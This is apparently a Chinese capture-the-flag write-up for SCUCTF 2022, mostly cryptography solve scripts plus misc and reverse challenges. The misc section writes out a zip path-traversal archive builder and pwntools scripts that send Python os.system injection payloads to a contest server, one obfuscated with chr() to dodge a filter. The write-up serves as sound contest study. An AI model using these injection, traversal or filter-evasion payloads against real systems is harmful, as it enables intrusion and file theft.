2022SCUCTF题解

版权声明: 知识共享-版权归属-相同方式共享 3.0 授权协议 | CC BY-SA 3.0 CN

systemcall safe on

Crypto

ez_math

二次剩余求解二次同余方程。网上抄的脚本。

from Crypto.Util.number import *
# Challenge parameters: p is used as the odd prime modulus (cipolla below
# requires one) and a is the value whose square roots modulo p are wanted.
p = 10633422823586641149987674611498617713504538254098629772932594430746901821947698235981680825181906211362587494944457098739784046411665369071558829066081189
a = 1998864314689507283073620353498454561179240654344354244305436493079140699439237202376223842334895492652637067218967769472206166222936609139445293873354277
def convertToBase(n, b):
    """Return the base-``b`` digits of ``n``, most significant digit first.

    Values below 2 are returned as the single digit ``[n]``.
    """
    if n < 2:
        return [n]
    digits = []
    remaining = n
    while remaining:
        remaining, digit = divmod(remaining, b)
        digits.append(digit)
    digits.reverse()
    return digits


# Takes integer n and odd prime p
# Returns both square roots of n modulo p as a pair (a,b)
# Returns () if no root
def cipolla(n, p):
    """Return both square roots of ``n`` modulo the odd prime ``p``.

    The result is ``(r, -r % p)``; ``()`` is returned when ``n`` is a
    quadratic non-residue (Euler's criterion fails). For ``p % 4 == 3`` the
    root is the direct power ``n^((p+1)/4)``; otherwise Cipolla's algorithm
    is run in F_p[sqrt(w)] with ``w = t*t - n`` for a non-residue ``w``.
    """
    n %= p
    if n in (0, 1):
        return (n, -n % p)
    phi = p - 1
    # Euler's criterion: n is a residue iff n^((p-1)/2) == 1 (mod p).
    if pow(n, phi // 2, p) != 1:
        return ()
    if p % 4 == 3:
        root = pow(n, (p + 1) // 4, p)
        return (root, -root % p)

    # Find t with t*t - n a non-residue (its Euler power equals p - 1).
    t = 0
    for cand in range(1, p):
        if pow((cand * cand - n) % p, phi // 2, p) == phi:
            t = cand
            break
    w = t * t - n

    def mult(u, v):
        # (a + b*sqrt(w)) * (c + d*sqrt(w)) in F_p[sqrt(w)].
        a, b = u
        c, d = v
        return ((a * c + b * d * w) % p, (a * d + b * c) % p)

    # Montgomery-style ladder over the bits of (p+1)/2 after the leading one:
    # x1 = (t + sqrt(w))^k, x2 = (t + sqrt(w))^(k+1) at every step.
    x1 = (t, 1)
    x2 = mult(x1, x1)
    for bit in convertToBase((p + 1) // 2, 2)[1:]:
        if bit == 0:
            x2 = mult(x2, x1)
            x1 = mult(x1, x1)
        else:
            x1 = mult(x1, x2)
            x2 = mult(x2, x2)
    return (x1[0], -x1[0] % p)

# Print both square roots of a modulo p; the two literals decoded below
# appear to be those roots pasted back in, one of which is the flag bytes.
print("Roots of a mod p:", cipolla(a, p))
# Small self-checks from the original script (kept for reference):
# print "Roots of 8218 mod 10007: " +str(cipolla(8218,10007))
# print "Roots of 56 mod 101: " +str(cipolla(56,101))
# print "Roots of 1 mod 11: " +str(cipolla(1,11))
# print "Roots of 8219 mod 10007: " +str(cipolla(8219,10007))
for root in (
    2983806571612194526961405572692022986638740339194067471831909775297069729649384214862874516129034255347837,
    10633422823586641149987674611498617713504538254095645966360982236219940416375006212995042084842712143890755585169160029010134662196802494555429794810733352,
):
    print(long_to_bytes(root))

ez_RSA

遍历平方根上/下所有质数即可。

from Crypto.Util.number import *
from gmpy2 import *
from sympy import nextprime
# Public modulus and ciphertext from the challenge.
n = 4035549166201063668625831121705576874008436911538281208575794760645544423624387564688426536718178366478435676670979144680200696978227814830144542100395711
c = 3786139261372475668724096193769377329093814957990266807059048553543359924439586359037603467723438602328535634566311132223900311678610183892863679621498865
# p and q share their leading digits (they sit right next to sqrt(n)), so
# they were found by stepping through primes from isqrt(n). Search used:
# mid = iroot(n, 2)[0]
# ups = mid
# while True:
#     ups = nextprime(ups)
#     if n % ups == 0:
#         print(ups, n // ups)
p = 63525972375092879554296019503424174440064543808584645254967172087718895967503
q = 63525972375092879554296019503424174440064543808584645254967172087718895782737
e = 65537
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
plaintext = pow(c, d, n)
print(long_to_bytes(plaintext))

ez_stream

单纯的LCG

抄的网上的代码。

from functools import reduce
from Crypto.Util.number import GCD, inverse, long_to_bytes
def crack_unknown_increment(states, modulus, multiplier):
    """Recover the LCG increment from two consecutive outputs.

    With s1 = a*s0 + c (mod m) and a, m known, c = s1 - a*s0 (mod m).
    Returns ``(modulus, multiplier, increment)``.
    """
    s0, s1 = states[0], states[1]
    increment = (s1 - multiplier * s0) % modulus
    return modulus, multiplier, increment
def crack_unknown_multiplier(states, modulus):
    """Recover the LCG multiplier from three consecutive outputs.

    s2 - s1 = a*(s1 - s0) (mod m), so a = (s2 - s1) * (s1 - s0)^-1 (mod m).
    ``inverse`` may raise when s1 - s0 is not invertible modulo m. The
    increment is then recovered by ``crack_unknown_increment``.
    """
    s0, s1, s2 = states[0], states[1], states[2]
    multiplier = (s2 - s1) * inverse(s1 - s0, modulus) % modulus
    return crack_unknown_increment(states, modulus, multiplier)
def crack_unknown_modulus(states):
    """Recover the LCG modulus from a run of consecutive outputs.

    Differences t_i = s_{i+1} - s_i satisfy t_{i+1} = a*t_i (mod m), so
    every t_{i+2}*t_i - t_{i+1}^2 is a multiple of m; their gcd is m (or a
    small multiple of it). Multiplier and increment follow from
    ``crack_unknown_multiplier``.
    """
    diffs = [later - earlier for earlier, later in zip(states, states[1:])]
    multiples = [
        t2 * t0 - t1 * t1
        for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])
    ]
    modulus = abs(reduce(GCD, multiples))
    return crack_unknown_multiplier(states, modulus)
# Consecutive LCG outputs captured from the challenge; the script below
# recovers (m, a, c) from them and steps one state back from streams[0].
streams = [9495827047149859431006132233092319600974497202909253926749062926629593244068453225049157210427035578610572648934127458697875459018625442857002141732217770, 10115020037566558567950233730614138895861258911796641397386881027127960456781622215464273323776545118396888793579040620180155181472925379479313621734027106, 7981464236725021226761002919675861665400231148613997426185256093560877035104768633006706451402090228382477159223882030737510433675925204999566093494578649, 7234746427175795537750797360089344216037062205426141685667019106513326156971404038531885341019184616074232937324413429612387506532206135481520255585379406, 1357271691014350448396348499212607078815784207280436403590895273573976719039929574669406267302326522264476319971818333746270219399739509954488350206939098, 7793179134619447746786204535466843534146448146433627831440211439100356628823998206285679114995319552700902657159016155894261217929142592869048023480586212, 4200327504806355753051034681672501621139445844167069726269562915330857270053067365147343903654640822017169864193359688974572363544448011864141566263095749, 108628953170107941851019292289726767457637648818478130784905137964469415279928037910613035615390728484479166491155355807849114853079424541224944189539847, 5705546688186793363975386254231457567617039881042153075212145501441367909435598304220032988441701636156883589472050191697468859533156776122580445917630325, 7981888661925380274343353230517871440910482184881452246559514192102636787698437211797463663103264392789656523953870523387090188318571331660341390462731390, 7457245978258721215462104387713889824053460895409859984119211875448230853693133504670379095111834060476305868684456810408551054941569397242555875768832649, 4713653327629167917403933577518371673458093664892888492572355124165551105119901889718017605151941173424260920921889047705106706830968478068151992223522578, 
2778597751579300390231070107111625883828070769573760110725311512998545986829373825533426150065870859785603212189825907356142828522955158081072354492809680, 9425692327305131597174516996805078131281224792942807687405090540733107737207289300618346774901368434264552235754283457515007094594155397130150749105141065, 9556791103080784553100760363166943075547406777892268608148510940860093314305835822848257344853594949658922763296325860053473764167311744969251511348213287, 3896599182642428007339381753538662783145048962607822890502362802858865113464050570340177651462017198029133580814296850288701444407514341373723669684607404, 5301032047745045360653610644813773116678094274772865081138467683002390318886475845448249954952652462684815881485467937894005492015515126563397015290271507, 10868560876138340913503045822008353068681490521878057747798994346359112617020680300987213799662349291611409047377282385725263726186142570966125699633074711, 7224059293852369017807048556361213684202031860793036930767704651075967932687581020962849350943008127181892942681851425187555531885333162641401020598706109, 7226506847869420283438523642497968822001335509181374339634589228508210118084622247062696000754665385287906355641339893928516640360280080695911187254582014, 4490720948265923860968128277045129252750568336235325441630922401592392266045933527280025412489344475057552346462497460984868092646213341802194388892641162, 12239413304325398135459519900658880538898158568425938945987878203058591924624777413114550809099368944806146909046355605791667787917390610337772668459482241, 12031682149667615392071800744401356969359813602233530042569742700015933405128350539724007232636961842858808427912797934459072652111927403074732121115504628, 4221093662830924228203427096071485647982605270125869903377211974849182525446297391581648132634312810831050522760260275007179715712643712807112993795753997, 
2482697446655927304158367339258791596351991275787745319752390116410069174704817051381264029708263048001624482866674356617492861541235444301461140118393072, 8640022216821216730690651815111823956880449322964650463439245341042028148002067020497662105357100062992076913929538672631319194491404650014998985176729399, 2359340306264030427013371066451754161105421482248597639896728896779325719717468031430724904579038543182751480657717151072505664496249601885013517511335354, 9564043228397984061879998221762974239257692421128455446103840572377581806608193811671996975444148075468746455929973308146521294633753660232825656123106269, 2907481445175213163867320739818049791618436439840769557448890646035507771955530568981806701569558507904871970470593181264954913164043063396749090598187913, 10918758557560698694046891429167354585108582071006014989054758320395366657576667871567836659358610198829544520915724060818132910952992777240463509701288475]
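# Recover the LCG parameters, then step one state backwards from the first
# output: s0 = a*seed + c (mod m)  =>  seed = (s0 - c) * a^-1 (mod m).
modulus, multiplier, increment = crack_unknown_modulus(streams)
# The recovered modulus is the one to invert against; the earlier version
# of this line referenced an undefined name and raised NameError.
flag = (streams[0] - increment) * inverse(multiplier, modulus) % modulus
print(long_to_bytes(flag))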

medium_math

中国剩余定理。爆破模数。检查是否全部printable

脚本是网上抄的。

# Moduli (ps) and residues (ans) of the congruence system x == ans[i] (mod ps[i]).
ps = [659393664465323, 906528195345220, 975250387802548, 969115381470588, 111169318220929, 1000427453556060, 954439163305195]
ans = [501927404661911, 766711039999273, 177155835710273, 288656999508165, 71725206442480, 876880066906893, 315100179694493]
import hashlib
from functools import reduce
from gmpy2 import gcd
from Crypto.Util.number import *
from string import printable

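# Number of congruences to combine; derived from the data (7 entries) rather
# than hard-coded so the lists can grow without editing this constant.
Num = len(ps)
# ``china`` reads the moduli and residues through these module globals.
m = ps
a = ans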
def egcd(a, b):
    """Extended Euclid: return ``(g, x, y)`` with ``a*x + b*y == g == gcd(a, b)``.

    The recursion bottoms out at ``a == 0`` with ``(b, 0, 1)``.
    """
    if a == 0:
        return (b, 0, 1)
    g, y_prev, x_prev = egcd(b % a, a)
    quotient = b // a
    return (g, x_prev - quotient * y_prev, y_prev)

def china(num):
    """Combine the first ``num`` congruences x == a[i] (mod m[i]) (CRT).

    Reads the module globals ``m`` and ``a``. The moduli need not be
    coprime: each step solves m1*x0 == a2 - a1 (mod m2) with ``egcd`` and
    the running modulus becomes m1*m2/g. Returns ``(x, lcm)`` with x a
    solution modulo lcm(m[0..num)); when some pair is inconsistent
    ((a2 - a1) % g != 0) it prints 'No Answer!' and returns 0.
    """
    residue, modulus, lcm = a[0], m[0], m[0]
    for i in range(1, num):
        m2, a2 = m[i], a[i]
        diff = a2 - residue
        g, k1, _ = egcd(modulus, m2)
        lcm = lcm * m2 // gcd(lcm, m2)
        if diff % g:
            print('No Answer!')
            return 0
        step = m2 // g
        x0 = diff // g * k1
        # Normalise x0 into [0, step).
        x0 = (x0 % step + step) % step
        residue += modulus * x0
        modulus = step * modulus
    return residue, lcm
# Solve the system, then brute-force the modulus: walk candidates x + k*lcm
# upward until one reaches about 355 bits, printing every candidate whose
# bytes are all printable ASCII.
ans, lcm = china(Num)
print(ans, lcm)
while ans.bit_length() < 355:
    ans += lcm
    candidate = long_to_bytes(ans)
    if all(chr(byte) in printable for byte in candidate):
        print(candidate)

medium_RSA

from Crypto.Util.number import bytes_to_long, getPrime
from random import getrandbits
from secret import flag

# Challenge generator (provided source): textbook RSA with 512-bit primes,
# plus a hint A that is the product of eleven factors 2*p + r, r < 2**10.
m = bytes_to_long(flag)
e = 0x10001
Bit = 512
num = 10
p, q = getPrime(Bit), getPrime(Bit)
n = p * q
c = pow(m, e, n)
# One factor first, then ``num`` more: A = prod_{i=0}^{num} (2p + r_i).
A = 2 * p + getrandbits(10)
for _ in range(num):
    A *= 2 * p + getrandbits(10)

print(n)
print(c)
print(A)

# 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
# 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
# 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000

以下是exp

from gmpy2 import *
from sympy import *
from Crypto.Util.number import *
# Values printed by the challenge: modulus n, ciphertext c and the hint A
# (product of 2p + r factors). num mirrors the generator but is not used
# by the solve below.
num = 10
n = 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889
c = 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011
A = 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000
# Every factor of A is 2p + r with a small r, so an integer root of A
# (after dividing out the powers of two) lands just above p; stepping down
# through primes until one divides n gives p. The search that produced the
# literal below was, in two variants:
# p = iroot(A // pow(2, 11), 11)[0]
# p = iroot(A, 10)[0] // pow(2, 10)
# while True:
#     p = prevprime(p)
#     if n % p == 0:
#         print(p)
#         break
p = 11084976913707120845676997473476120049925696537758139093110720348331501885877388177868038354130254514285517993448105804093297456650430613525974991412673613
q = n // p
e = 65537
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
plaintext = pow(c, d, n)
print(long_to_bytes(plaintext))

medium_stream

密钥复用。

from pwn import xor
from Crypto.Util.number import *
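# Two ciphertexts that, per the challenge, were produced with the same
# keystream: ``flag_k`` encrypts the flag and ``known`` encrypts a message
# whose plaintext is given. Because the keystream cancels in
# flag_k XOR known, XORing in the known plaintext yields the flag directly.
flag_k = 0x17cd2b76cea2303805f63a5dd38c0652f542d796d316dfcbc1ca5d0514f6096bb4f41fd2d2f45de0114a2b7d
known = 0x37e64f5efb8f3e7b7ba12f0d8fd84508a6129fc19051c1ddcb821f4242b6507be1e758c686a108f2455a3c7d

known_p = bytes_to_long(b'sh1kaku{Of all weapons,the past cut deepest}')
print(long_to_bytes(flag_k ^ known ^ known_p))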

ez_copper

考虑类似Factor with high bits known的做法

把多项式F(x) 变成,首一化后coppersmith即可。

1668743519285

然后就是基础的RSA

medium_copper

先通过dp泄露的原理推式子,得到,可以得知

考虑在模的意义下解方程,即,解出来后为的可能值,然后就是ez_copper

hard_math

考虑flag的前7位是一定的,枚举模数p,求出p的原根后可以列出以七个变量的七个方程,解出方程验证后还原flag即可

Misc

LSB but base64

先用stegesolve查看LSB发现均为乱码
1
根据提示 b64encode 得知要做 base64 编码:先将 16 进制数字转回 bytes,再进行 base64 编码。

from base64 import *
from Crypto.Util.number import *
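# Hex value read out of the image's LSB plane; the hint "b64encode" says to
# turn it back into raw bytes and base64-encode those.
a = 0x7E56A0FA2B3E5B795CD267BEEE8FB972E72D7FEE2777E9B5B1CFA2E7EBF7AF2F9FBA79F2
byte = long_to_bytes(a)
# Print explicitly: a bare expression statement only shows its value in a REPL.
print(b64encode(byte))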

得到结果
2

豪豪的晚餐

  1. 图片中有烤匠两个字确定店子是烤匠
  2. exif查看有经纬度,谷歌地图定位后找一个标志后输入到百度地图中点周边,美食,看最近的一家烤匠再去美团核实店名即可。

小宇的通勤

向上的指示牌是地铁2号和8号线,发现是同一种颜色,上网搜地铁线路标识色发现只有深圳地铁2号和8号是同一条,再看下面的地铁是黄色的确定是14号线,看交汇点既是结果:岗厦北。

豪豪扫描器

notepad++直接搜scu得到答案

3

Chicken

010editor打开,最底下发现一串base64,解码即是答案
4
5

后来

解的时候走了很多弯路,识图都识别不出来,试了很多办法都没用,搜索结果中也没有想要的,最后在浏览一个网址的时候发现和图中白色柱子长得一样的柱子。
6

[medium]unzip

from zipfile import *
from base64 import *
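# Build an archive whose single entry name carries a parent-directory
# traversal ("../../../flag"); an extractor that does not canonicalise
# entry names writes it outside its target directory. The archive is then
# base64-encoded for upload. ``with`` closes both handles even on error
# (the original left the zip's file object open).
with ZipFile("Uploads.zip", "w") as zipf:
    source_file = "flag"
    zipf.write(source_file, "../../../flag")

with open("Uploads.zip", "rb") as fi:
    base64d = b64encode(fi.read())
print(base64d.decode("ascii"))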

上传该文件,然后再 2查看解压后的文件地址,读出 /flag

[easy]learning_python

from pwn import *
# Interactive solve: connect, read whatever the service prints first, send
# one line of Python and read the reply.
context(log_level="debug")
conn = remote("114.117.187.56", 8901)
conn.recv()
payload = '__import__("os").system("cd .. ; cd .. ; cat flag")'
conn.sendline(bytes(payload, "utf-8"))
conn.recv()

[medium]learning python2

from pwn import *
# Same service as the previous level, but the line sent is rebuilt as
# eval(chr(..)+chr(..)+...): one chr() call per character of the original
# payload, so the transmitted text contains only eval, chr, digits and '+'.
context(log_level="debug")
conn = remote("114.117.187.56", 8902)
conn.recv()
payload = '__import__("os").system("cd .. ; cd .. ; cat flag")'
pieces = ["chr(" + str(ord(ch)) + ")" for ch in payload]
payloads = "eval(" + "+".join(pieces) + ")"
print(payloads)
conn.sendline(payloads.encode())
conn.recv()

learning python3

没有好好验题是这样的。

预期解可能是用 __subclasses__之类的花活。

from pwn import *
# Third level: the service still evaluates the submitted line, so a plain
# file read is sent.
context(log_level="debug")
conn = remote("114.117.187.56", 8903)
conn.recv()
payload = 'print(open("/flag", "r").read())'
conn.sendline(bytes(payload, "utf-8"))
conn.recv()

Reverse

ez_pyc

反编译。一眼z3-solver

from z3 import *

# One 8-bit unknown per flag byte. The 25 linear constraints below are the
# checks recovered from the decompiled pyc: integer coefficients times the
# flag bytes, compared with a constant.
# NOTE(review): with 8-bit BitVecs the sums wrap modulo 256 and z3 coerces
# the right-hand constants to 8 bits as well, so the system is solved
# modulo 256 rather than over the integers — confirm against the model.
flag = [BitVec("%d" % i, 8) for i in range(25)]
s = Solver()
s.add(99 * flag[0] + 91 * flag[1] + 69 * flag[2] + 42 * flag[3] + 65 * flag[4] + 86 * flag[5] + 63 * flag[6] + 9 * flag[7] + 60 * flag[8] + 82 * flag[9] + 61 * flag[10] + 65 * flag[11] + 14 * flag[12] + 86 * flag[13] + 2 * flag[14] + 53 * flag[15] + 56 * flag[16] + 17 * flag[17] + 88 * flag[18] + 20 * flag[19] + 6 * flag[20] + 21 * flag[21] + 100 * flag[22] + 24 * flag[23] + 11 * flag[24] == 133017)
s.add(99 * flag[0] + 2 * flag[1] + 14 * flag[2] + 30 * flag[3] + 38 * flag[4] + 23 * flag[5] + 6 * flag[6] + 100 * flag[7] + 43 * flag[8] + 58 * flag[9] + 82 * flag[10] + 20 * flag[11] + 19 * flag[12] + 39 * flag[13] + 16 * flag[14] + 1 * flag[15] + 15 * flag[16] + 82 * flag[17] + 97 * flag[18] + 47 * flag[19] + 28 * flag[20] + 51 * flag[21] + 96 * flag[22] + 54 * flag[23] + 43 * flag[24] == 113856)
s.add(63 * flag[0] + 86 * flag[1] + 33 * flag[2] + 39 * flag[3] + 45 * flag[4] + 76 * flag[5] + 37 * flag[6] + 64 * flag[7] + 65 * flag[8] + 56 * flag[9] + 32 * flag[10] + 69 * flag[11] + 38 * flag[12] + 1 * flag[13] + 20 * flag[14] + 44 * flag[15] + 16 * flag[16] + 78 * flag[17] + 12 * flag[18] + 97 * flag[19] + 29 * flag[20] + 46 * flag[21] + 54 * flag[22] + 81 * flag[23] + 47 * flag[24] == 126193)
s.add(9 * flag[0] + 100 * flag[1] + 1 * flag[2] + 5 * flag[3] + 99 * flag[4] + 20 * flag[5] + 37 * flag[6] + 91 * flag[7] + 53 * flag[8] + 85 * flag[9] + 52 * flag[10] + 49 * flag[11] + 69 * flag[12] + 32 * flag[13] + 7 * flag[14] + 81 * flag[15] + 80 * flag[16] + 89 * flag[17] + 87 * flag[18] + 24 * flag[19] + 90 * flag[20] + 54 * flag[21] + 16 * flag[22] + 6 * flag[23] + 2 * flag[24] == 128397)
s.add(72 * flag[0] + 18 * flag[1] + 71 * flag[2] + 28 * flag[3] + 67 * flag[4] + 25 * flag[5] + 26 * flag[6] + 59 * flag[7] + 96 * flag[8] + 30 * flag[9] + 65 * flag[10] + 39 * flag[11] + 29 * flag[12] + 35 * flag[13] + 95 * flag[14] + 55 * flag[15] + 67 * flag[16] + 63 * flag[17] + 72 * flag[18] + 61 * flag[19] + 30 * flag[20] + 74 * flag[21] + 38 * flag[22] + 61 * flag[23] + 58 * flag[24] == 138932)
s.add(30 * flag[0] + 69 * flag[1] + 52 * flag[2] + 68 * flag[3] + 94 * flag[4] + 37 * flag[5] + 13 * flag[6] + 85 * flag[7] + 97 * flag[8] + 66 * flag[9] + 57 * flag[10] + 40 * flag[11] + 11 * flag[12] + 93 * flag[13] + 87 * flag[14] + 22 * flag[15] + 61 * flag[16] + 3 * flag[17] + 17 * flag[18] + 54 * flag[19] + 22 * flag[20] + 18 * flag[21] + 57 * flag[22] + 58 * flag[23] + 88 * flag[24] == 136211)
s.add(81 * flag[0] + 62 * flag[1] + 83 * flag[2] + 60 * flag[3] + 71 * flag[4] + 64 * flag[5] + 96 * flag[6] + 88 * flag[7] + 96 * flag[8] + 39 * flag[9] + 23 * flag[10] + 77 * flag[11] + 85 * flag[12] + 87 * flag[13] + 3 * flag[14] + 3 * flag[15] + 56 * flag[16] + 67 * flag[17] + 59 * flag[18] + 11 * flag[19] + 32 * flag[20] + 41 * flag[21] + 1 * flag[22] + 71 * flag[23] + 10 * flag[24] == 141572)
s.add(95 * flag[0] + 66 * flag[1] + 37 * flag[2] + 55 * flag[3] + 2 * flag[4] + 29 * flag[5] + 65 * flag[6] + 85 * flag[7] + 68 * flag[8] + 95 * flag[9] + 77 * flag[10] + 16 * flag[11] + 2 * flag[12] + 94 * flag[13] + 54 * flag[14] + 92 * flag[15] + 44 * flag[16] + 48 * flag[17] + 70 * flag[18] + 25 * flag[19] + 57 * flag[20] + 48 * flag[21] + 74 * flag[22] + 63 * flag[23] + 49 * flag[24] == 143300)
s.add(79 * flag[0] + 85 * flag[1] + 53 * flag[2] + 93 * flag[3] + 69 * flag[4] + 33 * flag[5] + 63 * flag[6] + 2 * flag[7] + 93 * flag[8] + 82 * flag[9] + 73 * flag[10] + 37 * flag[11] + 91 * flag[12] + 13 * flag[13] + 1 * flag[14] + 62 * flag[15] + 60 * flag[16] + 17 * flag[17] + 7 * flag[18] + 95 * flag[19] + 65 * flag[20] + 91 * flag[21] + 14 * flag[22] + 64 * flag[23] + 66 * flag[24] == 146502)
s.add(33 * flag[0] + 57 * flag[1] + 13 * flag[2] + 85 * flag[3] + 83 * flag[4] + 31 * flag[5] + 73 * flag[6] + 41 * flag[7] + 19 * flag[8] + 41 * flag[9] + 80 * flag[10] + 33 * flag[11] + 5 * flag[12] + 42 * flag[13] + 3 * flag[14] + 27 * flag[15] + 1 * flag[16] + 55 * flag[17] + 24 * flag[18] + 72 * flag[19] + 21 * flag[20] + 98 * flag[21] + 89 * flag[22] + 58 * flag[23] + 41 * flag[24] == 118533)
s.add(29 * flag[0] + 5 * flag[1] + 52 * flag[2] + 22 * flag[3] + 21 * flag[4] + 8 * flag[5] + 41 * flag[6] + 10 * flag[7] + 51 * flag[8] + 69 * flag[9] + 90 * flag[10] + 63 * flag[11] + 90 * flag[12] + 24 * flag[13] + 91 * flag[14] + 99 * flag[15] + 40 * flag[16] + 6 * flag[17] + 17 * flag[18] + 81 * flag[19] + 47 * flag[20] + 100 * flag[21] + 99 * flag[22] + 3 * flag[23] + 46 * flag[24] == 124392)
s.add(59 * flag[0] + 64 * flag[1] + 99 * flag[2] + 26 * flag[3] + 76 * flag[4] + 42 * flag[5] + 37 * flag[6] + 62 * flag[7] + 14 * flag[8] + 15 * flag[9] + 15 * flag[10] + 49 * flag[11] + 10 * flag[12] + 88 * flag[13] + 5 * flag[14] + 3 * flag[15] + 52 * flag[16] + 70 * flag[17] + 89 * flag[18] + 37 * flag[19] + 98 * flag[20] + 1 * flag[21] + 18 * flag[22] + 75 * flag[23] + 13 * flag[24] == 118223)
s.add(66 * flag[0] + 65 * flag[1] + 5 * flag[2] + 80 * flag[3] + 42 * flag[4] + 93 * flag[5] + 42 * flag[6] + 15 * flag[7] + 1 * flag[8] + 90 * flag[9] + 4 * flag[10] + 14 * flag[11] + 97 * flag[12] + 25 * flag[13] + 68 * flag[14] + 93 * flag[15] + 78 * flag[16] + 33 * flag[17] + 33 * flag[18] + 70 * flag[19] + 21 * flag[20] + 10 * flag[21] + 25 * flag[22] + 92 * flag[23] + 43 * flag[24] == 122643)
s.add(25 * flag[0] + 95 * flag[1] + 15 * flag[2] + 82 * flag[3] + 82 * flag[4] + 99 * flag[5] + 9 * flag[6] + 60 * flag[7] + 74 * flag[8] + 8 * flag[9] + 82 * flag[10] + 99 * flag[11] + 79 * flag[12] + 83 * flag[13] + 8 * flag[14] + 42 * flag[15] + 41 * flag[16] + 75 * flag[17] + 93 * flag[18] + 75 * flag[19] + 36 * flag[20] + 57 * flag[21] + 84 * flag[22] + 99 * flag[23] + 67 * flag[24] == 166882)
s.add(26 * flag[0] + 14 * flag[1] + 83 * flag[2] + 22 * flag[3] + 62 * flag[4] + 50 * flag[5] + 68 * flag[6] + 95 * flag[7] + 27 * flag[8] + 99 * flag[9] + 29 * flag[10] + 31 * flag[11] + 12 * flag[12] + 37 * flag[13] + 18 * flag[14] + 51 * flag[15] + 36 * flag[16] + 72 * flag[17] + 98 * flag[18] + 96 * flag[19] + 25 * flag[20] + 49 * flag[21] + 6 * flag[22] + 59 * flag[23] + 2 * flag[24] == 120884)
s.add(15 * flag[0] + 51 * flag[1] + 6 * flag[2] + 80 * flag[3] + 72 * flag[4] + 49 * flag[5] + 13 * flag[6] + 28 * flag[7] + 57 * flag[8] + 1 * flag[9] + 43 * flag[10] + 82 * flag[11] + 36 * flag[12] + 36 * flag[13] + 55 * flag[14] + 2 * flag[15] + 96 * flag[16] + 29 * flag[17] + 2 * flag[18] + 82 * flag[19] + 60 * flag[20] + 65 * flag[21] + 100 * flag[22] + 37 * flag[23] + 12 * flag[24] == 118151)
s.add(32 * flag[0] + 44 * flag[1] + 6 * flag[2] + 70 * flag[3] + 17 * flag[4] + 49 * flag[5] + 66 * flag[6] + 51 * flag[7] + 29 * flag[8] + 13 * flag[9] + 38 * flag[10] + 26 * flag[11] + 27 * flag[12] + 18 * flag[13] + 73 * flag[14] + 1 * flag[15] + 67 * flag[16] + 45 * flag[17] + 10 * flag[18] + 49 * flag[19] + 63 * flag[20] + 9 * flag[21] + 75 * flag[22] + 46 * flag[23] + 88 * flag[24] == 105637)
s.add(39 * flag[0] + 90 * flag[1] + 54 * flag[2] + 62 * flag[3] + 25 * flag[4] + 97 * flag[5] + 53 * flag[6] + 92 * flag[7] + 90 * flag[8] + 34 * flag[9] + 53 * flag[10] + 91 * flag[11] + 84 * flag[12] + 78 * flag[13] + 88 * flag[14] + 8 * flag[15] + 88 * flag[16] + 24 * flag[17] + 86 * flag[18] + 33 * flag[19] + 98 * flag[20] + 46 * flag[21] + 69 * flag[22] + 80 * flag[23] + 47 * flag[24] == 168627)
